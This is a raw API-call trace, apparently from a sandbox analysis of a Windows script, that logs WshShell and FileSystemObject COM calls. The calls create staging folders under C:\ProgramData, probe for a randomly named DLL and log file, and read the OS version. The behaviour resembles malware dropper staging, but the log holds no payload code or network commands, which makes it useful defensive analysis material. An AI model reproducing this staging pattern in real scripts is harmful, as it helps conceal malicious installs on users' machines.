[0059.610] WshShell:IUnknown:QueryInterface (in: This=0x2cfb04, riid=0x6d1e5710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xced2c | out: ppvObject=0xced2c*=0x2a7eb4) returned 0x0
[0059.610] WshShell:IUnknown:Release (This=0x2cfb04) returned 0x1
[0059.610] CLSIDFromProgID (in: lpszProgID="Shell.Application", lpclsid=0xceda4 | out: lpclsid=0xceda4*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
[0059.611] SysStringLen (param_1=0x0) returned 0x0
[0059.611] CoGetClassObject (in: rclsid=0xceda4*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x5, pvReserved=0x0, riid=0x6d1e087c*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xced98 | out: ppv=0xced98*=0x2a7efc) returned 0x0
[0059.612] WshShell:IUnknown:QueryInterface (in: This=0x2a7efc, riid=0x6d1e7884*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0xced94 | out: ppvObject=0xced94*=0x0) returned 0x80004002
[0059.613] WshShell:IClassFactory:CreateInstance (in: This=0x2a7efc, pUnkOuter=0x0, riid=0x6d1e0270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xced9c | out: ppvObject=0xced9c*=0x2cfce4) returned 0x0
[0059.613] WshShell:IUnknown:Release (This=0x2a7efc) returned 0x0
[0059.613] CoTaskMemFree (pv=0x290790)
[0059.613] WshShell:IUnknown:QueryInterface (in: This=0x2cfce4, riid=0x6d1e5a50*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0xced50 | out: ppvObject=0xced50*=0x2a7f8c) returned 0x0
[0059.614] WshShell:IObjectWithSite:SetSite (This=0x2a7f8c, pUnkSite=0x7ef00) returned 0x0
[0059.614] WshShell:IUnknown:QueryInterface (in: This=0x7ef00, riid=0x76a63e0c*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xce80c | out: ppvObject=0xce80c*=0x0) returned 0x80004002
[0059.614] WshShell:IUnknown:QueryInterface (in: This=0x7ef00, riid=0x76a63e0c*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xce7cc | out: ppvObject=0xce7cc*=0x0) returned 0x80004002
[0059.614] WshShell:IUnknown:QueryInterface (in: This=0x7ef00, riid=0x76a597c4*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xce7b4 | out: ppvObject=0xce7b4*=0x0) returned 0x80004002
[0059.614] WshShell:IUnknown:QueryInterface (in: This=0x7ef00, riid=0x76a69b0c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xce768 | out: ppvObject=0xce768*=0x7ef00) returned 0x0
[0059.615] WshShell:IUnknown:AddRef (This=0x7ef00) returned 0x3
[0059.615] WshShell:IUnknown:QueryInterface (in: This=0x7ef00, riid=0x76a4c15c*(Data1=0x18, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xce6c8 | out: ppvObject=0xce6c8*=0x0) returned 0x80004002
[0059.615] WshShell:IUnknown:QueryInterface (in: This=0x7ef00, riid=0x76a4c0a8*(Data1=0x19, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2ced0c | out: ppvObject=0x2ced0c*=0x0) returned 0x80004002
[0059.615] WshShell:IUnknown:QueryInterface (in: This=0x7ef00, riid=0x76a4c16c*(Data1=0x4c1e39e1, Data2=0xe3e3, Data3=0x4296, Data4=([0]=0xaa, [1]=0x86, [2]=0xec, [3]=0x93, [4]=0x8d, [5]=0x89, [6]=0x6e, [7]=0x92)), ppvObject=0xce6d0 | out: ppvObject=0xce6d0*=0x0) returned 0x80004002
[0059.615] WshShell:IUnknown:Release (This=0x7ef00) returned 0x2
[0059.620] WshShell:IDispatch:Invoke (in: This=0x2a7ddc, dispIdMember=1006, riid=0x6d1e0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0xcee24*(rgvarg=([0]=0xcedc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="%temp%", varVal2=0x1d74600)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0xcf054, pExcepInfo=0xcee38, puArgErr=0xcee34 | out: pDispParams=0xcee24*(rgvarg=([0]=0xcedc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="%temp%", varVal2=0x1d74600)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0xcf054*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp", varVal2=0x0), pExcepInfo=0xcee38*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0xcee34*=0x0) returned 0x0
[0059.621] WshShell:IUnknown:Release (This=0x2a7ddc) returned 0x1
[0059.622] _ftime (_Tmb=0xce920)
[0059.625] WshShell:IDispatch:GetIDsOfNames (in: This=0x2a7ddc, riid=0x6d1e0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0xcee5c*="ExpandEnvironmentStrings", cNames=0x1, lcid=0x409, rgDispId=0xcee80 | out: rgDispId=0xcee80*=1006) returned 0x0
[0059.625] WshShell:IUnknown:AddRef (This=0x2a7ddc) returned 0x2
[0059.625] WshShell:IDispatch:Invoke (in: This=0x2a7ddc, dispIdMember=1006, riid=0x6d1e0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0xcee24*(rgvarg=([0]=0xcedc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="%temp%", varVal2=0x1d74600)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0xcf054, pExcepInfo=0xcee38, puArgErr=0xcee34 | out: pDispParams=0xcee24*(rgvarg=([0]=0xcedc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="%temp%", varVal2=0x1d74600)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0xcf054*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp", varVal2=0x0), pExcepInfo=0xcee38*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0xcee34*=0x0) returned 0x0
[0059.625] WshShell:IUnknown:Release (This=0x2a7ddc) returned 0x1
[0059.629] CLSIDFromProgID (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0xcea24 | out: lpclsid=0xcea24*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
[0059.629] SysStringLen (param_1=0x0) returned 0x0
[0059.629] CoGetClassObject (in: rclsid=0xcea24*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x5, pvReserved=0x0, riid=0x6d1e087c*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xcea18 | out: ppv=0xcea18*=0x7e5a0) returned 0x0
[0059.629] FileSystemObject:IUnknown:QueryInterface (in: This=0x7e5a0, riid=0x6d1e7884*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0xcea14 | out: ppvObject=0xcea14*=0x0) returned 0x80004002
[0059.629] FileSystemObject:IClassFactory:CreateInstance (in: This=0x7e5a0, pUnkOuter=0x0, riid=0x6d1e0270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xcea1c | out: ppvObject=0xcea1c*=0x7e5c0) returned 0x0
[0059.629] FileSystemObject:IUnknown:Release (This=0x7e5a0) returned 0x0
[0059.629] CoTaskMemFree (pv=0x290790)
[0059.629] FileSystemObject:IUnknown:QueryInterface (in: This=0x7e5c0, riid=0x6d1e5a50*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0xce9d0 | out: ppvObject=0xce9d0*=0x0) returned 0x80004002
[0059.629] FileSystemObject:IUnknown:QueryInterface (in: This=0x7e5c0, riid=0x6d1e5700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0xce9bc | out: ppvObject=0xce9bc*=0x0) returned 0x80004002
[0059.629] FileSystemObject:IUnknown:QueryInterface (in: This=0x7e5c0, riid=0x6d1e55f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0xce9b8 | out: ppvObject=0xce9b8*=0x0) returned 0x80004002
[0059.629] FileSystemObject:IUnknown:QueryInterface (in: This=0x7e5c0, riid=0x6d1e5608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0xce9b4 | out: ppvObject=0xce9b4*=0x0) returned 0x80004002
[0059.629] FileSystemObject:IUnknown:QueryInterface (in: This=0x7e5c0, riid=0x6d1e5764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0xce9b0 | out: ppvObject=0xce9b0*=0x0) returned 0x80004002
[0059.630] FileSystemObject:IUnknown:QueryInterface (in: This=0x7e5c0, riid=0x6d1e5710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xce9ac | out: ppvObject=0xce9ac*=0x7e5c0) returned 0x0
[0059.630] FileSystemObject:IUnknown:Release (This=0x7e5c0) returned 0x1
[0059.630] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x7e5c0, riid=0x6d1e0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0xceadc*="CreateFolder", cNames=0x1, lcid=0x409, rgDispId=0xceb00 | out: rgDispId=0xceb00*=1120) returned 0x0
[0059.630] FileSystemObject:IUnknown:AddRef (This=0x7e5c0) returned 0x2
[0059.630] FileSystemObject:IDispatch:Invoke (in: This=0x7e5c0, dispIdMember=1120, riid=0x6d1e0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0xceaa4*(rgvarg=([0]=0xcea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\ProgramData\\tempa", varVal2=0x1d74600)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0xceab8, puArgErr=0xceab4 | out: pDispParams=0xceaa4*(rgvarg=([0]=0xcea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\ProgramData\\tempa", varVal2=0x1d74600)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0xceab8*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0xceab4*=0x7e5c0) returned 0x0
[0059.631] FileSystemObject:IUnknown:Release (This=0x7e5c0) returned 0x1
[0059.631] CLSIDFromProgID (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0xcea24 | out: lpclsid=0xcea24*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
[0059.631] SysStringLen (param_1=0x0) returned 0x0
[0059.631] CoGetClassObject (in: rclsid=0xcea24*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x5, pvReserved=0x0, riid=0x6d1e087c*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xcea18 | out: ppv=0xcea18*=0x7e5a0) returned 0x0
[0059.631] FileSystemObject:IUnknown:QueryInterface (in: This=0x7e5a0, riid=0x6d1e7884*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0xcea14 | out: ppvObject=0xcea14*=0x0) returned 0x80004002
[0059.631] FileSystemObject:IClassFactory:CreateInstance (in: This=0x7e5a0, pUnkOuter=0x0, riid=0x6d1e0270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xcea1c | out: ppvObject=0xcea1c*=0x7e5e0) returned 0x0
[0059.632] FileSystemObject:IUnknown:Release (This=0x7e5a0) returned 0x0
[0059.632] CoTaskMemFree (pv=0x290790)
[0059.632] FileSystemObject:IUnknown:QueryInterface (in: This=0x7e5e0, riid=0x6d1e5a50*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0xce9d0 | out: ppvObject=0xce9d0*=0x0) returned 0x80004002
[0059.632] FileSystemObject:IUnknown:QueryInterface (in: This=0x7e5e0, riid=0x6d1e5700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0xce9bc | out: ppvObject=0xce9bc*=0x0) returned 0x80004002
[0059.632] FileSystemObject:IUnknown:QueryInterface (in: This=0x7e5e0, riid=0x6d1e55f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0xce9b8 | out: ppvObject=0xce9b8*=0x0) returned 0x80004002
[0059.632] FileSystemObject:IUnknown:QueryInterface (in: This=0x7e5e0, riid=0x6d1e5608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0xce9b4 | out: ppvObject=0xce9b4*=0x0) returned 0x80004002
[0059.632] FileSystemObject:IUnknown:QueryInterface (in: This=0x7e5e0, riid=0x6d1e5764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0xce9b0 | out: ppvObject=0xce9b0*=0x0) returned 0x80004002
[0059.632] FileSystemObject:IUnknown:QueryInterface (in: This=0x7e5e0, riid=0x6d1e5710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xce9ac | out: ppvObject=0xce9ac*=0x7e5e0) returned 0x0
[0059.632] FileSystemObject:IUnknown:Release (This=0x7e5e0) returned 0x1
[0059.632] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x7e5e0, riid=0x6d1e0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0xceadc*="CreateFolder", cNames=0x1, lcid=0x409, rgDispId=0xceb00 | out: rgDispId=0xceb00*=1120) returned 0x0
[0059.632] FileSystemObject:IUnknown:AddRef (This=0x7e5e0) returned 0x2
[0059.632] FileSystemObject:IDispatch:Invoke (in: This=0x7e5e0, dispIdMember=1120, riid=0x6d1e0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0xceaa4*(rgvarg=([0]=0xcea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\ProgramData\\xxx6000137xx", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0xceab8, puArgErr=0xceab4 | out: pDispParams=0xceaa4*(rgvarg=([0]=0xcea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\ProgramData\\xxx6000137xx", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0xceab8*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0xceab4*=0x7e5e0) returned 0x0
[0059.633] FileSystemObject:IUnknown:Release (This=0x7e5e0) returned 0x1
[0059.633] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x7e400, riid=0x6d1e0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0xceadc*="FileExists", cNames=0x1, lcid=0x409, rgDispId=0xceb00 | out: rgDispId=0xceb00*=10016) returned 0x0
[0059.633] FileSystemObject:IUnknown:AddRef (This=0x7e400) returned 0x2
[0059.633] FileSystemObject:IDispatch:Invoke (in: This=0x7e400, dispIdMember=10016, riid=0x6d1e0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0xceaa4*(rgvarg=([0]=0xcea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\ProgramData\\tempa\\marxvxinhhm64.dll", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0xcecd4, pExcepInfo=0xceab8, puArgErr=0xceab4 | out: pDispParams=0xceaa4*(rgvarg=([0]=0xcea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\ProgramData\\tempa\\marxvxinhhm64.dll", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0xcecd4*(varType=0xb, wReserved1=0x1d9, wReserved2=0xeb58, wReserved3=0xc, varVal1=0x0, varVal2=0x0), pExcepInfo=0xceab8*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0xceab4*=0x7e400) returned 0x0
[0059.633] FileSystemObject:IUnknown:Release (This=0x7e400) returned 0x1
[0059.634] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x7e400, riid=0x6d1e0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0xceadc*="FileExists", cNames=0x1, lcid=0x409, rgDispId=0xceb00 | out: rgDispId=0xceb00*=10016) returned 0x0
[0059.634] FileSystemObject:IUnknown:AddRef (This=0x7e400) returned 0x2
[0059.634] FileSystemObject:IDispatch:Invoke (in: This=0x7e400, dispIdMember=10016, riid=0x6d1e0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0xceaa4*(rgvarg=([0]=0xcea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\ProgramData\\tempa\\0131vrxi.log", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0xcecd4, pExcepInfo=0xceab8, puArgErr=0xceab4 | out: pDispParams=0xceaa4*(rgvarg=([0]=0xcea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\ProgramData\\tempa\\0131vrxi.log", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0xcecd4*(varType=0xb, wReserved1=0x1d9, wReserved2=0xeb58, wReserved3=0xc, varVal1=0x0, varVal2=0x0), pExcepInfo=0xceab8*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0xceab4*=0x7e400) returned 0x0
[0059.634] FileSystemObject:IUnknown:Release (This=0x7e400) returned 0x1
[0059.634] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x7e400, riid=0x6d1e0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0xceadc*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0xceb00 | out: rgDispId=0xceb00*=10012) returned 0x0
[0059.634] FileSystemObject:IUnknown:AddRef (This=0x7e400) returned 0x2
[0059.634] FileSystemObject:IDispatch:Invoke (in: This=0x7e400, dispIdMember=10012, riid=0x6d1e0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0xceaa4*(rgvarg=([0]=0xcea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\ProgramData\\tempa\\marxvxinhhm64.dll", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0xcecd4, pExcepInfo=0xceab8, puArgErr=0xceab4 | out: pDispParams=0xceaa4*(rgvarg=([0]=0xcea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\ProgramData\\tempa\\marxvxinhhm64.dll", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0xcecd4*(varType=0x0, wReserved1=0x1d9, wReserved2=0xeb58, wReserved3=0xc, varVal1=0x800a0035, varVal2=0x0), pExcepInfo=0xceab8*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x800a0035), puArgErr=0xceab4*=0x7e400) returned 0x80020009
[0059.635] FileSystemObject:IUnknown:Release (This=0x7e400) returned 0x1
[0059.635] GetVersionExA (in: lpVersionInformation=0xce260*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x3, dwPlatformId=0x0, szCSDVersion="\x80") | out: lpVersionInformation=0xce260*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0059.635] FindResourceA (hModule=0x6d1d0000, lpName=0x4, lpType=0x6) returned 0x17b0738
[0059.692] LoadResource (hModule=0x6d1d0000, hResInfo=0x17b0738) returned 0x17b0c4c
[0059.692] LockResource (hResData=0x17b0c4c) returned 0x17b0c4c
[0059.692] SizeofResource (hModule=0x6d1d0000, hResInfo=0x17b0738) returned 0x16e
[0059.693] FreeResource (hResData=0x17b0c4c) returned 0
[0059.693] FindResourceA (hModule=0x6d1d0000, lpName=0x101, lpType=0x6) returned 0x17b07e8
[0059.693] LoadResource (hModule=0x6d1d0000, hResInfo=0x17b07e8) returned 0x17b1c74
[0059.693] LockResource (hResData=0x17b1c74) returned 0x17b1c74
[0059.693] SizeofResource (hModule=0x6d1d0000, hResInfo=0x17b07e8) returned 0xce
[0059.693] FreeResource (hResData=0x17b1c74) returned 0
[0059.693] bsearch (_Key=0xceb34, _Base=0x6d2715c0, _NumOfElements=0x5d, _SizeOfElements=0x8, _PtFuncCompare=0x6d1dc38c) returned 0x6d271638
[0059.694] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x7e400, riid=0x6d1e0bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0xceadc*="FileExists", cNames=0x1, lcid=0x409, rgDispId=0xceb00 | out: rgDispId=0xceb00*=10016) returned 0x0
[0059.694] FileSystemObject:IUnknown:AddRef (This=0x7e400) returned 0x2
